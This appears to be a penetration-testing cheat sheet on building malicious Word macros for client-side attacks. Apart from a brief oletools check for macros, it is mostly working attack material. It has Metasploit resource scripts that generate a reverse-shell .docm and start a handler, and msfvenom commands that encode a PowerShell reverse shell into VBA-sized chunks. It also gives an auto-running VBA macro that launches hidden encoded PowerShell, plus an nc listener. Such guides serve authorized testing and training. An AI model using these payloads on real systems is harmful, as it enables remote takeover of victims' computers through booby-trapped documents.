Macros can be used for client-side attacks (malicious document). They are written in Visual Basic Application (VBA).
Check macro in file
Install oletools (olevba)
sudo -H pip install -U oletoolsCheck macro in file
olevba -c <filename.doc>Create a macro
Save the document as .docm or .doc (Word 97-2003). Do NOT use .docx as they do not support embedded macros.
Microsoft Word
- Open Microsoft Office Word or Excel
- Create a blank document
- Click on the View tab
- Click on Macros
- Enter macro name Test
- Select Macros in: Document1 (or your document name)
- Click on Create
LibreOffice
Does not work 🙁 More investigation is required…
- Open LibreOffice and create a new document (Writer Document).
- Click on menu Tools->Macros->Organize macros
- Click on the current document.
- Click New.
- Enter name Test
- Save the file (use “Word 97-2003” for .doc extension).
Generate macro – Metasploit
Parameter “DisablePayloadHandler” does not work for this module. Setting it to “False” will NOT create a listener.
msf-generate-word-macro.rc – Meterpreter payload
setg LHOST tun0
setg LPORT 80
setg PAYLOAD windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set FILENAME macro.docm
run
use exploit/multi/handler
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -jmsf-generate-word-macro.rc – Not Meterpreter paylaod
setg LHOST tun0
setg LPORT 80
setg PAYLOAD windows/shell_reverse_tcp
use exploit/multi/fileformat/office_word_macro
set FILENAME macro.docm
run
use exploit/multi/handler
set ExitOnSession false
exploit -jExecute
sudo msfconsole -q -r msf-generate-word-macro.rcGenerate macro – Manually
Use Msfvenom to generate a reverse shell payload. See also Powershell Cheat Sheet.
Payload must be split into 255-character chunks as VBA has a limitation on string length.
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f psh | iconv -t UTF-16LE | base64 -w 255 > windows_shell_b64.txtfor line in $(cat windows_shell_b64.txt); do echo "strFunnyStuff = strFunnyStuff + \"$line\""; done;msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f psh | iconv -t UTF-16LE | base64 -w 0 > windows_shell_b64.txt
str=`cat windows_shell_b64.txt`;for (( i=0; i<=${#str}; i+=255 )); do echo "strFunnyStuff = strFunnyStuff + \"${str:$i:255}\""; doneSub Document_Open()
Test
End Sub
Sub AutoOpen()
Test
End Sub
Sub Test()
Dim strFunnyStuff As String
' Split string into 255-char chunks as VBA has a limitation on string length
'strFunnyStuff = "cmd"
strFunnyStuff = "powershell.exe -nop -w hidden -e "
strFunnyStuff = strFunnyStuff + "<base64 payload>"
CreateObject("Wscript.Shell").Run strFunnyStuff
End SubStart a listener on Kali
nc -lnvp 4444